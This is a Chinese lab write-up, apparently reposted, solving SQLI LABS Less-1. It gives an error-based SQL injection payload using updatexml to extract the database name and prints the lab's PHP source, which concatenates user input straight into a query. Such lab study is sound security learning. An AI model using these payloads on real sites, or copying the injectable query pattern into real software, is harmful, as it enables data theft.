当前位置: 首页 > news >正文

SQLI LABS | Less-1 GET - Error based - Single Quotes - String

关注这个靶场的其它相关笔记:SQLI LABS —— 靶场笔记合集-CSDN博客

0x01:过关流程

输入下面的链接进入靶场(如果你的地址和我不一样,按照你本地的环境来):

 http://localhost/sqli-labs/Less-1/

靶场提示 Please input the ID as parameter with numeric value 要我们输入一个数字型的 ID 作为参数进行查询,那我们就按它的意思传入 id 看看网页返回的结果:

可以看到,服务器返回了对应 id 用户的登录名与登录密码。此时,我们可以再输入几个数据进行测试:

 测试 Payload 01: ?id=1  # 结果: Your Login name:Dumb      Your Password:Dumb测试 Payload 02: ?id=2  # 结果: Your Login name:Angelina  Your Password:I-kill-you测试 Payload 03: ?id=2-1 # 结果: Your Login name:Angelina  Your Password:I-kill-you测试 Payload 04: ?id=1' # 结果: 报错

可以看到,当我们传递 Payload 04 给服务器后端时,页面显示了报错信息,并且还返回了部分后端的查询模板。

既然能显示报错信息,那么本关我们就直接使用报错注入(使用 Union 联合注入也是可以的,但是,从本关的名称 Error based 就可以看出,本关的考点是报错注入),攻击 Payload 如下:

 -- 获取当前服务器正在使用的数据库的名称攻击 Payload: ?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1) --+'笔者备注: 0x7e 是字符 ~ 号,用于标识服务器报出来的数据。

可以看到,我们已经成功获取了当前站点使用的后端数据库的信息。至此,SQLI LABS Less-1 GET - Error based - Single Quotes - String 成功过关。

0x02:源码分析

下面是 SQLI LABS Less-1 GET - Error based - Single Quotes - String 后端的部分源码,以及笔者做的笔记:

<?php//including the Mysql connect parameters.include("../sql-connections/sqli-connect.php"); // 导入数据库连接文件,获取数据库连接对象error_reporting(0);                             // 关闭错误报告,奈何还是会报错啊// take the variables if(isset($_GET['id']))                          // 如果通过 GET 方法获取到了 id 字段就执行下面的内容{$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);​// connectivity ​​$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; // 查询语句(完全没有对用户输入的内容做过滤)// $sql="SELECT * FROM users WHERE id='0' union select 1,2,3 -- ' LIMIT 0,1";// $sql="SELECT * FROM users WHERE id='0' union select 1,2,3 # ' LIMIT 0,1";$result=mysqli_query($con1, $sql);$row = mysqli_fetch_array($result, MYSQLI_BOTH);​if($row){echo "<font size='5' color= '#99FF00'>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "</font>";}else {echo '<font color= "#FFFF00">';print_r(mysqli_error($con1));echo "</font>";  }}else { echo "Please input the ID as parameter with numeric value"; }​?>


http://www.mrgr.cn/news/53507.html

相关文章:

  • HCIA复习实验
  • 查缺补漏----Cache命中率与缺失率的辨析
  • Guava防击穿回源
  • 蚂蚁华东师范大学:从零开始学习定义和解决一般优化问题LLMOPT
  • 动态规划一>下降路径最小和
  • 代码随想录算法训练营第48天| 739. 每日温度,496.下一个更大元素 I,503.下一个更大元素II
  • 华为OD机试2024年真题(基站维修工程师)
  • 网页打印——魔都千丝冥缘——未来之窗行业应用跨平台架构
  • 滑动窗口-无重复字符的最长字串
  • vscode open editors 打开
  • 写论文节省论文页面空间的办法
  • latex常见长度单位
  • 第一百零七周周报
  • 如何保护您的服务器免受 POODLE SSLv3 漏洞的影响
  • wpf grid 的用法
  • WordPress任推帮网盘拉新数据统计插件
  • Miniconda管理虚拟环境【Python环境配置】
  • HDU RealPhobia
  • Spring实现3种异步流式接口,解决接口超时烦恼
  • Apple Vision Pro市场表现分析:IDC最新数据揭示的真相